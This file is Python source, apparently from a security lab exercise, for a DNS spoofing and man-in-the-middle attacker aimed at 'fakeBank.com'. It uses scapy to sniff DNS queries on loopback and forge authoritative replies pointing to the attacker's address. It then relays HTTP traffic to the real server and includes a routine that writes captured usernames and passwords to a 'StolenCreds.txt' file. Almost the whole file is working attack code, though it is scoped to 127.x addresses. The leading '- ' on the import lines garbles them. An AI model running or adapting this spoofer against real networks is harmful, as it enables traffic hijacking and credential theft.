- import argparse
- import socket
- from scapy.all import *
# Route scapy's layer-3 send() through a raw socket.
# NOTE(review): presumably set so that packets reach the loopback interface
# used by sniff_and_spoof() -- confirm against the lab setup.
conf.L3socket = L3RawSocket

# TCP port the relay binds to and also the port it dials on the real server.
WEB_PORT = 8000

# Host name passed to handle_tcp_forwarding() once a reply has been sent.
HOSTNAME = "fakeBank.com"
def resolveHostname(hostname):
    """Return the address of the genuine server for *hostname*.

    The exercise pins this to a fixed loopback address instead of doing a
    DNS lookup, so the argument is never consulted.
    """
    real_server_ip = "127.1.1.1"
    return real_server_ip
def log_credentials(username, password):
    """Write one captured username/password pair to the lab's output file.

    The file is opened in "wb" mode, so every call replaces the previous
    contents, and the pair is stored as plain text.
    """
    with open("lib/attacker/StolenCreds.txt", "wb") as out_file:
        # Built inside the `with` so a bad argument type fails after the
        # file has been opened, as the concatenation form does.
        record = "".join(
            ["Stolen credentials: username=", username, " password=", password]
        )
        out_file.write(record)
def check_credentials(client_data):
    """Inspect one block of client data for login credentials.

    TODO (from the exercise): search client_data for a username/password
    and pass any match to log_credentials(). For now the block is only
    echoed to stdout and nothing is returned.
    """
    print(client_data)
def handle_tcp_forwarding(client_socket, client_ip, hostname):
    """Relay one request and one response per accepted connection.

    client_socket must already be bound; it is switched to listening here.
    For each accepted connection a fresh TCP connection is opened to
    resolveHostname(hostname) on WEB_PORT. Up to 5000 bytes are read from
    the client, handed to check_credentials(), sent upstream, and up to
    5000 bytes of the reply are sent back. client_ip is accepted but unused.

    The loop has no exit condition, so this function never returns.
    TODO (from the exercise): stop once a POST to '/post_logout' completes.
    """
    client_socket.listen(1)
    while True:
        print("before accept")
        downstream, _peer = client_socket.accept()
        print("after accept")

        upstream = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        upstream_addr = (resolveHostname(hostname), WEB_PORT)
        upstream.connect(upstream_addr)

        # Only the first recv() result in each direction is relayed.
        request = downstream.recv(5000)
        print(request)
        # NOTE(review): the bytes are inspected exactly as received, so this
        # presumably depends on the client speaking plain HTTP; a client that
        # requires TLS with certificate verification would not deliver
        # readable data to this relay.
        check_credentials(request)
        upstream.send(request)

        reply = upstream.recv(5000)
        downstream.send(reply)

        # Only the upstream socket is closed; the accepted connection is not.
        upstream.close()
def dns_callback(packet, extra_args):
    """Reply to a sniffed DNS packet with a forged answer, then start the relay.

    extra_args is the (source_ip, sock) pair supplied by sniff_and_spoof().
    The reply swaps the packet's IP addresses and UDP ports, copies its DNS
    id and question section, sets qr=1 and aa=1, and carries one answer
    record mapping the queried name to source_ip with a TTL of 10. The
    queried name is not compared with HOSTNAME. After the reply is sent,
    control passes to handle_tcp_forwarding(), which does not return.
    """
    source_ip, sock = extra_args

    client_ip = packet[IP].src
    print("client_ip:  " + str(client_ip))

    # Mirror the addressing of the sniffed packet so the reply goes back to
    # its sender.
    reply_ip = IP(src=packet[IP].dst, dst=packet[IP].src)
    reply_udp = UDP(sport=packet[UDP].dport, dport=packet[UDP].sport)

    query = packet.getlayer(DNS)
    answer = DNSRR(rrname=query.qd.qname, ttl=10, rdata=source_ip)
    reply_dns = DNS(id=query.id, qd=query.qd, qr=1, aa=1, an=answer)

    spoof_msg = reply_ip / reply_udp / reply_dns
    send(spoof_msg)
    print(spoof_msg.summary())

    handle_tcp_forwarding(sock, client_ip, HOSTNAME)
def sniff_and_spoof(source_ip):
    """Bind the relay socket and pass sniffed DNS traffic to dns_callback().

    A TCP socket is bound to (source_ip, WEB_PORT); it is put into listening
    state later, inside handle_tcp_forwarding(). scapy then sniffs
    'udp port 53' on the loopback interface 'lo' and invokes
    dns_callback(packet, (source_ip, sock)) for each packet.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.bind((source_ip, WEB_PORT))

    callback_args = (source_ip, sock)

    def on_packet(packet):
        # Adapter: sniff() calls prn with the packet only.
        return dns_callback(packet, callback_args)

    sniff(filter='udp port 53', prn=on_packet, iface='lo')
def main():
    """Parse --source_ip and start sniff_and_spoof() with it.

    --source_ip defaults to "127.0.0.3". Because the option is declared with
    nargs='?' and const=1, giving the flag without a value yields the
    integer 1 rather than an address string.
    """
    cli = argparse.ArgumentParser(
        description='Attacker who spoofs dns packet and hijacks connection'
    )
    cli.add_argument(
        '--source_ip',
        nargs='?',
        const=1,
        default="127.0.0.3",
        help='ip of the attacker',
    )
    options = cli.parse_args()
    sniff_and_spoof(options.source_ip)


if __name__ == "__main__":
    main()